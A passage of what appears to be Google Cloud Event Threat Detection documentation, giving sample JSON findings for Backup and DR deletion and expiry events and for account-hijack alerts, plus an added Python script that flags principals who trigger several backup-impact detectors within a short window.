      "cloudLoggingQueryUri": [
        { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" }
      ],
      "relatedFindingUri": {}
    },
    "description": "A storage pool, which associates a Cloud Storage bucket with Google Cloud Backup and DR, has been removed from Backup and DR. Future backups to this storage target will fail.",
    "backupDisasterRecovery": {
      "storagePool": "STORAGE_POOL_NAME"
    }
  }
}

Impact: Google Cloud Backup and DR delete template

{
  "finding": {
    "access": {
      "principalEmail": "USER_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": { "regionCode": "REGION_CODE" },
      "serviceName": "backupdr.googleapis.com",
      "methodName": "deleteSlt",
      "principalSubject": "user:USER_EMAIL"
    },
    "attackExposure": {},
    "backupDisasterRecovery": {
      "backupTemplate": "TEMPLATE_NAME",
      "backupCreateTime": "EVENT_TIMESTAMP"
    },
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/FINDING_LOCATION/findings/FINDING_ID",
    "category": "Impact: Google Cloud Backup and DR delete template",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "createTime": "EVENT_TIMESTAMP",
    "database": {},
    "description": "A predefined backup template, which is used to set up backups for multiple applications, was deleted. The ability to set up backups in the future might be impacted.",
    "eventTime": "EVENT_TIMESTAMP",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "IMPACT",
      "primaryTechniques": [ "INHIBIT_SYSTEM_RECOVERY" ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "severity": "LOW",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "display_name": "PROJECT_ID",
    "type": "google.cloud.resourcemanager.Project",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID",
    "parent_display_name": "FOLDER_NAME",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": { "ruleName": "backup_template_delete_template" },
    "detectionPriority": "MEDIUM",
    "affectedResources": [
      { "gcpResourceName": "//backupdr.googleapis.com/projects/PROJECT_NUMBER" },
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": { "seconds": "0", "nanos": 0.0 },
          "insertId": "INSERT_ID"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1490/"
      },
      "cloudLoggingQueryUri": [
        { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" }
      ],
      "relatedFindingUri": {}
    },
    "description": "A predefined backup template, which is used to set up backups for multiple applications, was deleted. The ability to set up backups in the future might be impacted.",
    "backupDisasterRecovery": {
      "backupTemplate": "TEMPLATE_NAME"
    }
  }
}

Impact: Google Cloud Backup and DR expire all images

{
  "finding": {
    "access": {
      "principalEmail": "USER_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": {},
      "serviceName": "backupdr.googleapis.com",
      "methodName": "expireBackups",
      "principalSubject": "user:USER_EMAIL"
    },
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/FINDING_LOCATION/findings/FINDING_ID",
    "category": "Impact: Google Cloud Backup and DR expire all images",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "createTime": "EVENT_TIMESTAMP",
    "database": {},
    "description": "A user requested the deletion of all backup images for a protected application from the Google Cloud Backup and DR Service. The deletion of backup images does not prevent future backups.",
    "eventTime": "EVENT_TIMESTAMP",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "IMPACT",
      "primaryTechniques": [ "DATA_DESTRUCTION" ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "severity": "HIGH",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "display_name": "PROJECT_ID",
    "type": "google.cloud.resourcemanager.Project",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID",
    "parent_display_name": "FOLDER_NAME",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": { "ruleName": "backup_expire_images_all" },
    "detectionPriority": "HIGH",
    "affectedResources": [
      { "gcpResourceName": "//backupdr.googleapis.com/projects/PROJECT_NUMBER" },
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": { "seconds": "0", "nanos": 0.0 },
          "insertId": "INSERT_ID"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1485/"
      },
      "cloudLoggingQueryUri": [
        { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" }
      ],
      "relatedFindingUri": {}
    },
    "description": "A user requested the deletion of all backup images for a protected application from the Google Cloud Backup and DR Service. The deletion of backup images does not prevent future backups."
  }
}

Impact: Google Cloud Backup and DR expire image

{
  "finding": {
    "access": {
      "principalEmail": "USER_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": { "regionCode": "REGION_CODE" },
      "serviceName": "backupdr.googleapis.com",
      "methodName": "expireBackup",
      "principalSubject": "user:USER_EMAIL"
    },
    "attackExposure": {},
    "backupDisasterRecovery": {
      "backupTemplate": "TEMPLATE_NAME",
      "policies": [ "POLICY_NAME" ],
      "profile": "PROFILE_NAME",
      "backupCreateTime": "EVENT_TIMESTAMP"
    },
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/FINDING_LOCATION/findings/FINDING_ID",
    "category": "Impact: Google Cloud Backup and DR expire image",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "createTime": "EVENT_TIMESTAMP",
    "database": {},
    "description": "A user requested the deletion of a backup image from the Google Cloud Backup and DR Service. The deletion of a backup image does not prevent future backups.",
    "eventTime": "EVENT_TIMESTAMP",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "IMPACT",
      "primaryTechniques": [ "DATA_DESTRUCTION" ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "severity": "HIGH",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "display_name": "PROJECT_ID",
    "type": "google.cloud.resourcemanager.Project",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID",
    "parent_display_name": "FOLDER_NAME",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": { "ruleName": "backup_expire_image" },
    "detectionPriority": "MEDIUM",
    "affectedResources": [
      { "gcpResourceName": "//backupdr.googleapis.com/projects/PROJECT_NUMBER" },
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": { "seconds": "0", "nanos": 0.0 },
          "insertId": "INSERT_ID"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1485/"
      },
      "cloudLoggingQueryUri": [
        { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" }
      ],
      "relatedFindingUri": {}
    },
    "description": "A user requested the deletion of a backup image from the Google Cloud Backup and DR Service. The deletion of a backup image does not prevent future backups.",
    "backupDisasterRecovery": {
      "backupTemplate": "TEMPLATE_NAME",
      "policies": [ "POLICY_NAME" ],
      "profile": "PROFILE_NAME"
    }
  }
}

Impact: Google Cloud Backup and DR reduced backup expiration

{
  "finding": {
    "access": {
      "principalEmail": "USER_EMAIL",
      "callerIp": "CALLER_IP",
      "callerIpGeo": { "regionCode": "REGION_CODE" },
      "serviceName": "backupdr.googleapis.com",
      "methodName": "updateBackup",
      "principalSubject": "user:USER_EMAIL"
    },
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/FINDING_LOCATION/findings/FINDING_ID",
    "category": "Impact: Google Cloud Backup and DR reduced backup expiration",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "createTime": "EVENT_TIMESTAMP",
    "database": {},
    "description": "The expiration date for a backup has been reduced.",
    "eventTime": "EVENT_TIMESTAMP",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "IMPACT",
      "primaryTechniques": [ "INHIBIT_SYSTEM_RECOVERY" ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "severity": "MEDIUM",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "display_name": "PROJECT_ID",
    "type": "google.cloud.resourcemanager.Project",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID",
    "parent_display_name": "FOLDER_NAME",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": { "ruleName": "backup_reduce_backup_expiration" },
    "detectionPriority": "LOW",
    "affectedResources": [
      { "gcpResourceName": "//backupdr.googleapis.com/projects/PROJECT_NUMBER" },
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": { "seconds": "0", "nanos": 0.0 },
          "insertId": "INSERT_ID"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1490/"
      },
      "cloudLoggingQueryUri": [
        { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" }
      ],
      "relatedFindingUri": {}
    },
    "description": "The expiration date for a backup has been reduced."
  }
}

Impact: Google Cloud Backup and DR reduced backup frequency

{
  "finding": {
    "access": {
      "principalEmail": "USER_EMAIL",
      "callerIp": "CALLER_IP",
      "callerIpGeo": { "regionCode": "REGION_CODE" },
      "serviceName": "backupdr.googleapis.com",
      "methodName": "updatePolicy",
      "principalSubject": "user:USER_EMAIL"
    },
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/FINDING_LOCATION/findings/FINDING_ID",
    "category": "Impact: Google Cloud Backup and DR reduced backup frequency",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "createTime": "EVENT_TIMESTAMP",
    "database": {},
    "description": "The backup schedule has been modified to reduce backup frequency.",
    "eventTime": "EVENT_TIMESTAMP",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "IMPACT",
      "primaryTechniques": [ "INHIBIT_SYSTEM_RECOVERY" ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "severity": "LOW",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "display_name": "PROJECT_ID",
    "type": "google.cloud.resourcemanager.Project",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID",
    "parent_display_name": "FOLDER_NAME",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": { "ruleName": "backup_reduce_backup_frequency" },
    "detectionPriority": "LOW",
    "affectedResources": [
      { "gcpResourceName": "//backupdr.googleapis.com/projects/PROJECT_NUMBER" },
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": { "seconds": "0", "nanos": 0.0 },
          "insertId": "INSERT_ID"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1490/"
      },
      "cloudLoggingQueryUri": [
        { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" }
      ],
      "relatedFindingUri": {}
    },
    "description": "The backup schedule has been modified to reduce backup frequency."
  }
}
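Taken one at a time, most of the Backup and DR findings above are LOW or MEDIUM, but the same principal deleting a vault, removing a plan association and expiring all images inside a few minutes is the pattern a defender wants surfaced. The following added example (not part of the Google Cloud documentation and not the Security Command Center client library) reads finding records shaped like the JSON above, keeps the IMPACT-tactic ones, and reports any principal whose backup-impact findings span several distinct detectors within a short window; the sample records, the 15-minute window and the three-detector threshold are constructed assumptions.

```python
"""Correlate Event Threat Detection Backup and DR findings by principal.

Added example. Records are dicts shaped like the documented findings
(top-level "finding" and "sourceProperties"); the samples below are
constructed and carry only the fields this script reads.
"""
from datetime import datetime, timedelta

# MITRE techniques that the Backup and DR detectors above are mapped to.
RECOVERY_IMPACT_TECHNIQUES = {"INHIBIT_SYSTEM_RECOVERY", "DATA_DESTRUCTION"}


def summarize(record):
    """Pull the triage-relevant fields out of one finding record."""
    finding = record["finding"]
    props = record.get("sourceProperties", {})
    # eventTime is RFC 3339; swap the trailing "Z" so fromisoformat accepts it.
    event_time = datetime.fromisoformat(finding["eventTime"].replace("Z", "+00:00"))
    return {
        "principal": finding["access"]["principalEmail"],
        "rule": props.get("detectionCategory", {}).get("ruleName"),
        "techniques": set(finding.get("mitreAttack", {}).get("primaryTechniques", [])),
        "severity": finding["severity"],
        "event_time": event_time,
    }


def is_backup_impact(summary):
    """True when the finding carries one of the backup-impact techniques."""
    return bool(summary["techniques"] & RECOVERY_IMPACT_TECHNIQUES)


def find_bursts(records, window=timedelta(minutes=15), min_distinct_rules=3):
    """Return {principal: [rule, ...]} for each principal whose backup-impact
    findings cover at least min_distinct_rules different detectors within
    any window-long span. Distinct rules are counted, so one detector firing
    repeatedly for the same principal does not trip the threshold by itself."""
    by_principal = {}
    for rec in records:
        s = summarize(rec)
        if is_backup_impact(s):
            by_principal.setdefault(s["principal"], []).append(s)

    bursts = {}
    for principal, items in by_principal.items():
        items.sort(key=lambda s: s["event_time"])
        for i, start in enumerate(items):  # sliding window anchored at each finding
            in_window = [s for s in items[i:]
                         if s["event_time"] - start["event_time"] <= window]
            rules = sorted({s["rule"] for s in in_window})
            if len(rules) >= min_distinct_rules:
                bursts[principal] = rules
                break
    return bursts


def _sample(rule, category, technique, principal, event_time, severity):
    """Build a minimal record in the shape of the documented findings (constructed)."""
    return {
        "finding": {
            "access": {"principalEmail": principal,
                       "serviceName": "backupdr.googleapis.com"},
            "category": category,
            "eventTime": event_time,
            "findingClass": "THREAT",
            "mitreAttack": {"primaryTactic": "IMPACT",
                            "primaryTechniques": [technique]},
            "severity": severity,
            "state": "ACTIVE",
        },
        "sourceProperties": {"detectionCategory": {"ruleName": rule}},
    }


# Constructed sample: ops-a hits three detectors in nine minutes; ops-b trips
# the same LOW detector twice, hours later, which should not be escalated.
SAMPLE_FINDINGS = [
    _sample("backup_delete_vault", "Impact: Deleted Google Cloud Backup and DR Vault",
            "INHIBIT_SYSTEM_RECOVERY", "ops-a@example.com", "2024-05-01T10:00:00Z", "MEDIUM"),
    _sample("backup_delete_backup_plan_association",
            "Impact: Deleted Google Cloud Backup and DR plan association",
            "INHIBIT_SYSTEM_RECOVERY", "ops-a@example.com", "2024-05-01T10:04:00Z", "MEDIUM"),
    _sample("backup_expire_images_all", "Impact: Google Cloud Backup and DR expire all images",
            "DATA_DESTRUCTION", "ops-a@example.com", "2024-05-01T10:09:00Z", "HIGH"),
    _sample("backup_template_delete_policy", "Impact: Google Cloud Backup and DR delete policy",
            "INHIBIT_SYSTEM_RECOVERY", "ops-b@example.com", "2024-05-01T14:30:00Z", "LOW"),
    _sample("backup_template_delete_policy", "Impact: Google Cloud Backup and DR delete policy",
            "INHIBIT_SYSTEM_RECOVERY", "ops-b@example.com", "2024-05-01T14:31:00Z", "LOW"),
]

if __name__ == "__main__":
    for principal, rules in find_bursts(SAMPLE_FINDINGS).items():
        print(f"escalate: {principal} triggered {len(rules)} backup-impact detectors: {rules}")
```

In production the records would come from a Security Command Center findings export rather than the inline samples; the same correlation applies to the Cloud Logging query linked from each finding's cloudLoggingQueryUri.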

Impact: Google Cloud Backup and DR remove appliance

{
  "finding": {
    "access": {
      "principalEmail": "USER_EMAIL",
      "callerIp": "CALLER_IP",
      "callerIpGeo": {
        "regionCode": "REGION_CODE"
      },
      "serviceName": "backupdr.googleapis.com",
      "methodName": "deleteCluster",
      "principalSubject": "user:USER_EMAIL"
    },
    "attackExposure": {},
    "backupDisasterRecovery": {
      "appliance": "APPLIANCE_NAME",
      "backupCreateTime": "EVENT_TIMESTAMP"
    },
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/FINDING_LOCATION/findings/FINDING_ID",
    "category": "Impact: Google Cloud Backup and DR remove appliance",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "createTime": "EVENT_TIMESTAMP",
    "database": {},
    "description": "A backup appliance was deleted from Google Cloud Backup and DR Service. Applications that are associated with the deleted backup appliance might not be protected.",
    "eventTime": "EVENT_TIMESTAMP",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "IMPACT",
      "primaryTechniques": [
        "DATA_DESTRUCTION"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "severity": "HIGH",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "display_name": "PROJECT_ID",
    "type": "google.cloud.resourcemanager.Project",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID",
    "parent_display_name": "FOLDER_NAME",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": {
      "ruleName": "backup_appliances_remove_appliance"
    },
    "detectionPriority": "MEDIUM",
    "affectedResources": [
      {
        "gcpResourceName": "//backupdr.googleapis.com/projects/PROJECT_NUMBER"
      },
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {
            "seconds": "0",
            "nanos": 0.0
          },
          "insertId": "INSERT_ID"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1485/"
      },
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "LINK_TO_LOG_QUERY"
        }
      ],
      "relatedFindingUri": {}
    },
    "description": "A backup appliance was deleted from Google Cloud Backup and DR Service. Applications that are associated with the deleted backup appliance might not be protected.",
    "backupDisasterRecovery": {
      "appliance": "APPLIANCE_NAME"
    }
  }
}

Inhibit System Recovery: Google Cloud Backup and DR remove plan

{
  "finding": {
    "access": {
      "principalEmail": "USER_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": {
        "regionCode": "REGION_CODE"
      },
      "serviceName": "backupdr.googleapis.com",
      "methodName": "deleteSla",
      "principalSubject": "user:USER_EMAIL"
    },
    "attackExposure": {},
    "backupDisasterRecovery": {
      "applications": [
        "HOST_NAME"
      ],
      "backupCreateTime": "EVENT_TIMESTAMP"
    },
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/FINDING_LOCATION/findings/FINDING_ID",
    "category": "Inhibit System Recovery: Google Cloud Backup and DR remove plan",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "createTime": "EVENT_TIMESTAMP",
    "database": {},
    "description": "A backup plan with multiple policies for an application was deleted from the Google Cloud Backup and DR Service. The deletion of a backup plan can prevent future backups.",
    "eventTime": "EVENT_TIMESTAMP",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "IMPACT",
      "primaryTechniques": [
        "INHIBIT_SYSTEM_RECOVERY"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "severity": "HIGH",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "display_name": "PROJECT_ID",
    "type": "google.cloud.resourcemanager.Project",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID",
    "parent_display_name": "FOLDER_NAME",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": {
      "ruleName": "backup_remove_plan"
    },
    "detectionPriority": "MEDIUM",
    "affectedResources": [
      {
        "gcpResourceName": "//backupdr.googleapis.com/projects/PROJECT_NUMBER"
      },
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {
            "seconds": "0",
            "nanos": 0.0
          },
          "insertId": "INSERT_ID"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1490/"
      },
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "LINK_TO_LOG_QUERY"
        }
      ],
      "relatedFindingUri": {}
    },
    "description": "A backup plan with multiple policies for an application was deleted from the Google Cloud Backup and DR Service. The deletion of a backup plan can prevent future backups.",
    "backupDisasterRecovery": {
      "applications": [
        "HOST_NAME"
      ]
    }
  }
}

Initial Access: Account Disabled Hijacked

This finding isn't available for project-level activations.

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//login.googleapis.com/organizations/ORGANIZATION_ID",
    "state": "ACTIVE",
    "category": "Initial Access: Account Disabled Hijacked",
    "sourceProperties": {
      "sourceId": {
        "organizationNumber": "ORGANIZATION_ID",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "detectionCategory": {
        "technique": "valid_accounts",
        "indicator": "audit_log",
        "ruleName": "account_disabled_hijacked"
      },
      "detectionPriority": "MEDIUM",
      "affectedResources": [
        {
          "gcpResourceName": "//login.googleapis.com/organizations/ORGANIZATION_ID"
        },
        {
          "gcpResourceName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID"
        }
      ],
      "evidence": [
        {
          "sourceLogId": {
            "resourceContainer": "organizations/ORGANIZATION_ID",
            "timestamp": {
              "seconds": "1624034293",
              "nanos": 6.78E8
            },
            "insertId": "INSERT_ID"
          }
        }
      ],
      "properties": {
        "serviceName": "login.googleapis.com",
        "methodName": "google.login.LoginService.accountDisabledHijacked",
        "ssoState": "UNKNOWN",
        "principalEmail": "PRINCIPAL_EMAIL"
      },
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/techniques/T1078/"
        },
        "cloudLoggingQueryUri": [
          {
            "displayName": "Cloud Logging Query Link",
            "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-06-18T16:38:13.678Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%22%22?project\u003d"
          }
        ],
        "workspacesUri": {
          "displayName": "Workspaces Link",
          "url": "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/login#account_disabled_hijacked"
        }
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-06-18T16:38:13.678Z",
    "createTime": "2021-06-18T16:38:16.508Z",
    "severity": "MEDIUM",
    "workflowState": "NEW",
    "canonicalName": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "findingClass": "THREAT"
  },
  "resource": {
    "name": "//login.googleapis.com/organizations/ORGANIZATION_ID"
  }
}

Initial Access: Database Superuser Writes to User Tables

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resource_name": "//cloudsql.googleapis.com/projects/PROJECT_ID/instances/INSTANCE_NAME",
    "state": "ACTIVE",
    "category": "Initial Access: Database Superuser Writes to User Tables",
    "sourceProperties": {
